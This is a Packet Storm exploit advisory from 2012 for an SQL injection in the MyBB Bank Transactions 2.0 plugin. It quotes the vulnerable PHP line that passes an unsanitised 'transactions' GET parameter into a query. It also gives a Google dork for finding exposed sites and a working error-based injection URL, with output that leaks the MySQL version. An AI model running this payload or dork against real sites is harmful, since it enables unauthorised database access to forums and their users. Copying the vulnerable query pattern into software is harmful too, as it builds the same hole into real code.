MyBB Bank Transactions 2.0 SQL Injection

2012-12-18T00:00:00
ID PACKETSTORM:118940
Type packetstorm
Reporter limb0
Modified 2012-12-18T00:00:00

Description

                                        
                                            `# Exploit Title: MyBB Bank Transactions Plugin SQL Injection  
# Google Dork: inurl:bank.php?transactions=  
# Date: 13.12.2012  
# Exploit Author: limb0  
# Vendor Homepage: http://mods.mybb.com/view/transactions  
# Software Link: www.kingofpersia.ir  
# Version: 2.0  
# Category:Web Security  
# Tested on: Linux  
  
================================SQLi==============================  
Installation:  
1:Download the plugin and copy-paste the files on the right directory  
2:Activate the plugin  
(On this step maybe you will get an error like:  
SQL Error:  
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM DEFAULT CHARSET=utf8' at line 7  
This is because of the plugin.Open the bank.php from the /inc/plugins directory and delete this part from every query:  
"TYPE=MyISAM DEFAULT CHARSET=utf8".When you click on Activate again everything should work right)  
  
------------------------------------------------------------------  
  
This vulnerability exists on bank.php  
Vulnerable lines  
  
$uid=$_GET['transactions'];  
$T_ID=1;  
$T_ufetch=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE uid=$uid ");  
  
-------------------------------------------------------------------  
  
Instructions:  
Go to: /bank.php?transactions=[SQLi]  
example:  
/bank.php?transactions=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--  
  
Result:  
1062 - Duplicate entry '5.5.27~1' for key 'group_key'  
  
Proof:http://postimage.org/image/i34m16ejj/  
  
  
  
`